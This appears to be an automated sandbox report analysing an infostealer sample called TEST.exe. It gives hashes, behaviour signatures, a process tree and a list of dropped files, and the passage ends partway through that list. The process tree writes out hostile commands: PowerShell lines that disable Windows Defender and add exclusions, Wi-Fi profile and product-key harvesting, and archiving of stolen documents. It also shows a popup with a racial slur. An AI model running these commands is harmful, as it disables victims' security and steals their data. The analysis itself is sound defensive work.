Analysis

  • max time kernel
    12s
  • max time network
    14s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    28-11-2024 08:30

General

  • Target

    TEST.exe

  • Size

    6.9MB

  • MD5

    7100e5417306c8387eb2d50dea73c09d

  • SHA1

    da375b670279c2948ce6c5052f9f4f344a892abf

  • SHA256

    c7b92bbcd228bc59048c9190b2d94d293972f6b0e566d77a1a5b10f352cb9217

  • SHA512

    c5f052ca4c7eb235e0bd6e83ff8149799af9533d25f90b7553a853dce1ff9be6f0643c6d920041bd63265d1688702a115fa3aca545c26544563fd94470b252cc

  • SSDEEP

    98304:aKDjWM8JEE1FEamaHl3Ne4i3Tf2PkOpfW9hZMMoVmkzhxIdfXeRpYRJJcGhEIFWW:aK0TeNTfm/pf+xk4dWRpmrbW3jmrr

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • UPX packed file 58 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\TEST.exe
    "C:\Users\Admin\AppData\Local\Temp\TEST.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1032
    • C:\Users\Admin\AppData\Local\Temp\TEST.exe
      "C:\Users\Admin\AppData\Local\Temp\TEST.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4164
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\TEST.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2896
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\TEST.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1936
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3340
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2828
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NIGGER PROGRAM', 0, 'nigger', 0+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3084
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('NIGGER PROGRAM', 0, 'nigger', 0+16);close()"
          4⤵
            PID:964
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌  ‍.scr'"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2192
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌  ‍.scr'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1224
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1216
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:1476
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:848
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:1984
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:5104
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:1772
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4432
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
            4⤵
              PID:3592
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1016
            • C:\Windows\system32\attrib.exe
              attrib -r C:\Windows\System32\drivers\etc\hosts
              4⤵
              • Drops file in Drivers directory
              • Views/modifies file attributes
              PID:2820
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1252
            • C:\Windows\system32\attrib.exe
              attrib +r C:\Windows\System32\drivers\etc\hosts
              4⤵
              • Drops file in Drivers directory
              • Views/modifies file attributes
              PID:3520
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4824
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:3464
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI10322\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\aH0qs.zip" *"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3300
            • C:\Users\Admin\AppData\Local\Temp\_MEI10322\rar.exe
              C:\Users\Admin\AppData\Local\Temp\_MEI10322\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\aH0qs.zip" *
              4⤵
              • Executes dropped EXE
              PID:3008
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic os get Caption"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2676
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic os get Caption
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:3992
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4172
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic computersystem get totalphysicalmemory
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:3880
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3444
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic csproduct get uuid
              4⤵
                PID:2752
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              3⤵
                PID:4400
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                  4⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2732
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                3⤵
                  PID:2844
                  • C:\Windows\System32\Wbem\WMIC.exe
                    wmic path win32_VideoController get name
                    4⤵
                    • Detects videocard installed
                    PID:4008
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                  3⤵
                    PID:4184
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:5060

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                Filesize

                2KB

                MD5

                627073ee3ca9676911bee35548eff2b8

                SHA1

                4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                SHA256

                85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                SHA512

                3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                944B

                MD5

                2e8eb51096d6f6781456fef7df731d97

                SHA1

                ec2aaf851a618fb43c3d040a13a71997c25bda43

                SHA256

                96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864

                SHA512

                0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                944B

                MD5

                408641808e457ab6e23d62e59b767753

                SHA1

                4205cfa0dfdfee6be08e8c0041d951dcec1d3946

                SHA256

                3921178878eb416764a6993c4ed81a1f371040dda95c295af535563f168b4258

                SHA512

                e7f3ffc96c7caad3d73c5cec1e60dc6c7d5ed2ced7d265fbd3a402b6f76fed310a087d2d5f0929ab90413615dad1d54fce52875750057cffe36ff010fc6323fb

              • C:\Users\Admin\AppData\Local\Temp\_MEI10322\VCRUNTIME140.dll

                Filesize

                96KB

                MD5

                f12681a472b9dd04a812e16096514974

                SHA1

                6fd102eb3e0b0e6eef08118d71f28702d1a9067c

                SHA256

                d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

                SHA512

                7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

              • C:\Users\Admin\AppData\Local\Temp\_MEI10322\_bz2.pyd

                Filesize

                46KB

                MD5

                0c13627f114f346604b0e8cbc03baf29

                SHA1

                bf77611d924df2c80aabcc3f70520d78408587a2

                SHA256

                df1e666b55aae6ede59ef672d173bd0d64ef3e824a64918e081082b8626a5861

                SHA512

                c97fa0f0988581eae5194bd6111c1d9c0e5b1411bab47df5aa7c39aad69bfbeca383514d6aaa45439bb46eacf6552d7b7ed08876b5e6864c8507eaa0a72d4334

              • C:\Users\Admin\AppData\Local\Temp\_MEI10322\_ctypes.pyd

                Filesize

                57KB

                MD5

                38fb83bd4febed211bd25e19e1cae555

                SHA1

                4541df6b69d0d52687edb12a878ae2cd44f82db6

                SHA256

                cd31af70cbcfe81b01a75ebeb2de86079f4cbe767b75c3b5799ef8b9f0392d65

                SHA512

                f703b231b675c45accb1f05cd34319b5b3b7583d85bf2d54194f9e7c704fbcd82ef2a2cd286e6a50234f02c43616fbeccfd635aefd73424c1834f5dca52c0931

              • C:\Users\Admin\AppData\Local\Temp\_MEI10322\_decimal.pyd

                Filesize

                104KB

                MD5

                7ba541defe3739a888be466c999c9787

                SHA1

                ad0a4df9523eeeafc1e67b0e4e3d7a6cf9c4dfac

                SHA256

                f90efa10d90d940cde48aafe02c13a0fc0a1f0be7f3714856b7a1435f5decf29

                SHA512

                9194a527a17a505d049161935432fa25ba154e1aee6306dee9054071f249c891f0ca7839de3a21d09b57fdc3f29ee7c4f08237b0dfffafa8f0078cfe464bed3b

              • C:\Users\Admin\AppData\Local\Temp\_MEI10322\_hashlib.pyd

                Filesize

                33KB

                MD5

                596df8ada4b8bc4ae2c2e5bbb41a6c2e

                SHA1

                e814c2e2e874961a18d420c49d34b03c2b87d068

                SHA256

                54348cfbf95fd818d74014c16343d9134282d2cf238329eec2cda1e2591565ec

                SHA512

                e16aad5230e4af7437b19c3db373b1a0a0a84576b608b34430cced04ffc652c6fb5d8a1fe1d49ac623d8ae94c8735800c6b0a12c531dcdd012b05b5fd61dff2e

              • C:\Users\Admin\AppData\Local\Temp\_MEI10322\_lzma.pyd

                Filesize

                84KB

                MD5

                8d9e1bb65a192c8446155a723c23d4c5

                SHA1

                ea02b1bf175b7ef89ba092720b3daa0c11bef0f0

                SHA256

                1549fe64b710818950aa9bf45d43fe278ce59f3b87b3497d2106ff793efa6cf7

                SHA512

                4d67306fe8334f772fe9d463cb4f874a8b56d1a4ad3825cff53cae4e22fa3e1adba982f4ea24785312b73d84a52d224dfb4577c1132613aa3ae050a990e4abdf

              • C:\Users\Admin\AppData\Local\Temp\_MEI10322\_queue.pyd

                Filesize

                24KB

                MD5

                fbbbfbcdcf0a7c1611e27f4b3b71079e

                SHA1

                56888df9701f9faa86c03168adcd269192887b7b

                SHA256

                699c1f0f0387511ef543c0df7ef81a13a1cffde4ce4cd43a1baf47a893b99163

                SHA512

                0a5ba701653ce9755048ae7b0395a15fbb35509bef7c4b4fe7f11dc4934f3bd298bcddbf2a05b61f75f8eb44c4c41b3616f07f9944e0620b031cbe87a7443284

              • C:\Users\Admin\AppData\Local\Temp\_MEI10322\_socket.pyd

                Filesize

                41KB

                MD5

                4351d7086e5221398b5b78906f4e84ac

                SHA1

                ba515a14ec1b076a6a3eab900df57f4f37be104d

                SHA256

                a0fa25eef91825797f01754b7d7cf5106e355cf21322e926632f90af01280abe

                SHA512

                a1bcf51e797ccae58a0b4cfe83546e5e11f8fc011ca3568578c42e20bd7a367a5e1fa4237fb57aa84936eec635337e457a61a2a4d6eca3e90e6dde18ae808025

              • C:\Users\Admin\AppData\Local\Temp\_MEI10322\_sqlite3.pyd

                Filesize

                54KB

                MD5

                d678600c8af1eeeaa5d8c1d668190608

                SHA1

                080404040afc8b6e5206729dd2b9ee7cf2cb70bc

                SHA256

                d6960f4426c09a12488eb457e62506c49a58d62a1cb16fbc3ae66b260453c2ed

                SHA512

                8fd5f0fd5bd60c6531e1b4ad867f81da92d5d54674028755e5680fb6005e6444805003d55b6cbaf4cdad7b4b301cffab7b010229f6fd9d366405b8ade1af72d9

              • C:\Users\Admin\AppData\Local\Temp\_MEI10322\_ssl.pyd

                Filesize

                60KB

                MD5

                156b1fa2f11c73ed25f63ee20e6e4b26

                SHA1

                36189a5cde36d31664acbd530575a793fc311384

                SHA256

                a9b5f6c7a94fb6bfaf82024f906465ff39f9849e4a72a98a9b03fc07bf26da51

                SHA512

                a8181ffeb3cf8ef2a25357217a3dd05242cc0165473b024cf0aeb3f42e21e52c2550d227a1b83a6e5dab33a185d78e86e495e9634e4f4c5c4a1aec52c5457dca

              • C:\Users\Admin\AppData\Local\Temp\_MEI10322\base_library.zip

                Filesize

                1.4MB

                MD5

                2a138e2ee499d3ba2fc4afaef93b7caa

                SHA1

                508c733341845e94fce7c24b901fc683108df2a8

                SHA256

                130e506ead01b91b60d6d56072c468aeb5457dd0f2ecd6ce17dfcbb7d51a1f8c

                SHA512

                1f61a0fda5676e8ed8d10dfee78267f6d785f9c131f5caf2dd984e18ca9e5866b7658ab7edb2ffd74920a40ffea5cd55c0419f5e9ee57a043105e729e10d820b

              • C:\Users\Admin\AppData\Local\Temp\_MEI10322\blank.aes

                Filesize

                119KB

                MD5

                0ab79036fa9cb37f994748ebb2b4a24b

                SHA1

                3d0e53db1326637855878185eadc89fc35499438

                SHA256

                07a405b7c38fd332168a870f664af2e0bdf346b17410028a6e101c641251f44c

                SHA512

                1d4004a1609378be78289a58e7245905fa114ad49bb755c5a5a9085b8fc73c523f4de75ca4bb630b003c7205bded2db82724ad0a2c6d80337dd50fc46ebc25bb

              • C:\Users\Admin\AppData\Local\Temp\_MEI10322\libcrypto-1_1.dll

                Filesize

                1.1MB

                MD5

                daa2eed9dceafaef826557ff8a754204

                SHA1

                27d668af7015843104aa5c20ec6bbd30f673e901

                SHA256

                4dab915333d42f071fe466df5578fd98f38f9e0efa6d9355e9b4445ffa1ca914

                SHA512

                7044715550b7098277a015219688c7e7a481a60e4d29f5f6558b10c7ac29195c6d5377dc234da57d9def0c217bb3d7feca332a64d632ca105503849f15e057ea

              • C:\Users\Admin\AppData\Local\Temp\_MEI10322\libffi-8.dll

                Filesize

                24KB

                MD5

                90a6b0264a81bb8436419517c9c232fa

                SHA1

                17b1047158287eb6471416c5df262b50d6fe1aed

                SHA256

                5c4a0d4910987a38a3cd31eae5f1c909029f7762d1a5faf4a2e2a7e9b1abab79

                SHA512

                1988dd58d291ee04ebfec89836bb14fcaafb9d1d71a93e57bd06fe592feace96cdde6fcce46ff8747339659a9a44cdd6cf6ac57ff495d0c15375221bf9b1666e

              • C:\Users\Admin\AppData\Local\Temp\_MEI10322\libssl-1_1.dll

                Filesize

                203KB

                MD5

                eac369b3fde5c6e8955bd0b8e31d0830

                SHA1

                4bf77158c18fe3a290e44abd2ac1834675de66b4

                SHA256

                60771fb23ee37b4414d364e6477490324f142a907308a691f3dd88dc25e38d6c

                SHA512

                c51f05d26fda5e995fe6763877d4fcdb89cd92ef2d6ee997e49cc1ee7a77146669d26ec00ad76f940ef55adae82921dede42e55f51bd10d1283ecfe7c5009778

              • C:\Users\Admin\AppData\Local\Temp\_MEI10322\python311.dll

                Filesize

                1.6MB

                MD5

                bb46b85029b543b70276ad8e4c238799

                SHA1

                123bdcd9eebcac1ec0fd2764a37e5e5476bb0c1c

                SHA256

                72c24e1db1ba4df791720a93ca9502d77c3738eebf8b9092a5d82aa8d80121d0

                SHA512

                5e993617509c1cf434938d6a467eb0494e04580ad242535a04937f7c174d429da70a6e71792fc3de69e103ffc5d9de51d29001a4df528cfffefdaa2cef4eaf31

              • C:\Users\Admin\AppData\Local\Temp\_MEI10322\rar.exe

                Filesize

                615KB

                MD5

                9c223575ae5b9544bc3d69ac6364f75e

                SHA1

                8a1cb5ee02c742e937febc57609ac312247ba386

                SHA256

                90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

                SHA512

                57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

              • C:\Users\Admin\AppData\Local\Temp\_MEI10322\rarreg.key

                Filesize

                456B

                MD5

                4531984cad7dacf24c086830068c4abe

                SHA1

                fa7c8c46677af01a83cf652ef30ba39b2aae14c3

                SHA256

                58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

                SHA512

                00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

              • C:\Users\Admin\AppData\Local\Temp\_MEI10322\select.pyd

                Filesize

                24KB

                MD5

                abf7864db4445bbbd491c8cff0410ae0

                SHA1

                4b0f3c5c7bf06c81a2c2c5693d37ef49f642a9b7

                SHA256

                ddeade367bc15ea09d42b2733d88f092da5e880362eabe98d574bc91e03de30e

                SHA512

                8f55084ee137416e9d61fe7de19e4cff25a4b752494e9b1d6f14089448ef93e15cd820f9457c6ce9268781bd08e3df41c5284801f03742bc5c40b3b81fb798c5

              • C:\Users\Admin\AppData\Local\Temp\_MEI10322\sqlite3.dll

                Filesize

                608KB

                MD5

                ddd0dd698865a11b0c5077f6dd44a9d7

                SHA1

                46cd75111d2654910f776052cc30b5e1fceb5aee

                SHA256

                a9dd0275131105df5611f31a9e6fbf27fd77d0a35d1a73a9f4941235fbc68bd7

                SHA512

                b2ee469ea5a6f49bbdd553363baa8ebad2baf13a658d0d0c167fde7b82eb77a417d519420db64f325d0224f133e3c5267df3aa56c11891d740d6742adf84dbe4

              • C:\Users\Admin\AppData\Local\Temp\_MEI10322\unicodedata.pyd

                Filesize

                293KB

                MD5

                bb3fca6f17c9510b6fb42101fe802e3c

                SHA1

                cb576f3dbb95dc5420d740fd6d7109ef2da8a99d

                SHA256

                5e2f1bbfe3743a81b00717011094798929a764f64037bedb7ea3d2ed6548eb87

                SHA512

                05171c867a5d373d4f6420136b6ac29fa846a85b30085f9d7fabcbb4d902afee00716dd52010ed90e97c18e6cb4e915f13f31a15b2d8507e3a6cfa80e513b6a2

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fxenxeht.1sg.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Users\Admin\AppData\Local\Temp\‏ ​‎      \Common Files\Desktop\CopyUse.xlsx

                Filesize

                10KB

                MD5

                29c14630094c9b47a67676bda815d7bf

                SHA1

                82363c580eca2c46cf67540379db796bbf927630

                SHA256

                ea77f949b264e6a60039e6e3d57c4a1223105f8305e4b66be72c7b35344ad933

                SHA512

                46c28754ab667159cbb688d0978571d41309aacfbb41675736d96a41828bf87b2fef18094341a8fff7e057b6927a7b5f34ede564e2d7cc4694a28990055b0876

              • C:\Users\Admin\AppData\Local\Temp\‏ ​‎      \Common Files\Desktop\RemoveStep.docx

                Filesize

                18KB

                MD5

                6cd0fc0133ac5dedafffa67f3c18a462

                SHA1

                0c7d6b5d90871e165a7ddb5b7ef85bd0f7c3b774

                SHA256

                2f6bb86a9d624f376fd8c369632b47cccde348b7cb1d96536744ea65f77ead02

                SHA512

                7f0bbd3f8b1df7e259b1d2f32793442b7b6979cd569f786685bc6497f14b95c986e60d65c1502696240762602e642ef38c2aa6091d329fcbf3a773f440ec95b0

              • C:\Users\Admin\AppData\Local\Temp\‏ ​‎      \Common Files\Desktop\SendRestore.docx

                Filesize

                20KB

                MD5

                fdff869d648f20b5daab233cbecf8a93

                SHA1

                cacfc99b832c787c5cbb6c9fde68ac7acbd19590

                SHA256

                b0d82d57c0e5aa7f4d8773fa8efaac4868019f8a5db7ad05bd00cc92f61ec4c8

                SHA512

                8fe35321cc6af7e3b65cc37135750084aff312e8c24073d0d83a9b7563200f6dffcea3e07685e6d648374bc973807115a9a1a100f602362f246e7ee68eaa6440

              • C:\Users\Admin\AppData\Local\Temp\‏ ​‎      \Common Files\Desktop\SetCopy.xlsx

                Filesize

                10KB

                MD5

                cd374c203781f41d77acdff091450f32

                SHA1

                4b26453ec5ed422ba7c8b4d765d4e873d75c23a6

                SHA256

                a5058ff7b832a8994b60697f810ed9a3538b6f1c83bc94a4b3521ce40e3d2db7

                SHA512

                37807766b8cd1f93eec2b69b04d6068145a288617b56427168a3bd360c6251a3d620a9a72786af2f01e39f6a099bd73e938ca31b4aeba0f729eb4dd43cc23082

              • C:\Users\Admin\AppData\Local\Temp\‏ ​‎      \Common Files\Desktop\TraceTest.docx

                Filesize

                16KB

                MD5

                13672abd7552837871f9c33941536e43

                SHA1

                ea1884ad1244bd269d079a6ffe3215aa670cc34f

                SHA256

                3d33bfdc09dfec8366824fad16742d3c987e0102dab5cb7c7037e83eb8c7e12d

                SHA512

                bd5c822a11993dd0ae21ae187774124cac178a128527b6db6f265f694b5498a1c806b6a8a12aac2ec3ddb4cca5d33faac9e338a3b41a2b984d508cd08d5e8609

              • C:\Users\Admin\AppData\Local\Temp\‏ ​‎      \Common Files\Documents\BackupImport.vdx

                Filesize

                1.9MB

                MD5

                f81ee29f6c537325c7009b0f90d4c0b1

                SHA1

                e1e96f036e15d293fcb5d70d9bdf83c4160691ae

                SHA256

                5a34b9867030252ac5d3471c9501f99cf35c978504962c02c6138074d279455a

                SHA512

                e8b38616f27e2c3830c05bbe4eeeb2b770e9cda9bd2fcfdf069adcb2ad1f89ced2be8cec07b2626e0d67a9fd57e4b95e3127b442aadbbc9b652805b7f0842c60

              • C:\Users\Admin\AppData\Local\Temp\‏ ​‎      \Common Files\Documents\InitializeExport.xlsx

                Filesize

                11KB

                MD5

                e6cba916bfcb58660fe0c51d478014d4

                SHA1

                be2da8df1a54b17e5214dbd2c85808fb83ed0b87

                SHA256

                d724afa3c35880d4cf084b613e2d75e855843eb6adba5dbf34034749c17c098f

                SHA512

                6402fec8bc7e7f638dc7d8d99345cd29b2ab02035f5d1b7b0f80eb72f9829da9948901719229e1770ea647e97c46e6d68f285e094bcf76cceae52dd2c4328804

              • C:\Users\Admin\AppData\Local\Temp\‏ ​‎      \Common Files\Documents\ResumeSet.docx

                Filesize

                18KB

                MD5

                a8c5ed49c86b3aef5114e7d058309f24

                SHA1

                7084e4bf116d6f89b10bf0e7c9cfb819e56f766c

                SHA256

                163de47e30224c5d2c9f7b56b6d5ada0fa114dd4003817397b088b6a68410e0b

                SHA512

                fb415f7fd4d3e80ba2ddbe50591a0321b9018f15203414f98c30c952f97ac59d8ecf73a317a7987954cdfa9c8b8455c65934ef6c5253d0f3a9fe662a1fe3895d

              • C:\Users\Admin\AppData\Local\Temp\‏ ​‎      \Common Files\Documents\SearchBackup.csv

                Filesize

                1.3MB

                MD5

                585005a7f8e20dae7dad74654922b936

                SHA1

                926be599e50bd432295d2d58a14b697c057c1f0c

                SHA256

                4f97275188e18ddbfde9a1c340566902b1b801612a83bd5ea8d6448f591f759c

                SHA512

                4655df0d1ca7da5cb4f42186ac14acda4c643f01c79d86545d70d1e07eaf3b965022f2cdbf022a74489e4c8801ee644335506c5a11f8f878332e69bcc7f85c71

              • C:\Users\Admin\AppData\Local\Temp\‏ ​‎      \Common Files\Documents\UnprotectConvert.xlsx

                Filesize

                12KB

                MD5

                4eef8b6fe00b3731dd978ccd6ca45511

                SHA1

                6bf13109ca049de2c5f6a47808fd7dc569334e21

                SHA256

                ba1d3a877c6ac6b860bbd0667510897db7efb51c7ed0e679d342d91040d28e4d

                SHA512

                3140570594f8ab6c5efb733141f1dbb4aaf50d61033e196a0efece88507c9799548552bb7adcc5c1ca4e55e7b456e452f38f08339d8bbc6c1e91ee3b718560ac

              • C:\Users\Admin\AppData\Local\Temp\‏ ​‎      \Common Files\Documents\UpdateBackup.vdx

                Filesize

                1.4MB

                MD5

                8c260cb75b77679804280156dd5715d9

                SHA1

                bc228074c105c80cdc84303360f512bc1bf4cf0c

                SHA256

                74952fb949f3941adf674b0e1c379dc582b5386d7536cd24e163933126bf2d89

                SHA512

                b879b0205e38adee5f8f86e671242e6c55e73a59b4afc9f8c06949027639ba4d485890a2aa90a5bf248e44179bf6f79e3965a0ab29f2cd8c658b3be534d96521

              • C:\Users\Admin\AppData\Local\Temp\‏ ​‎      \Common Files\Documents\WaitUnregister.txt

                Filesize

                1.7MB

                MD5

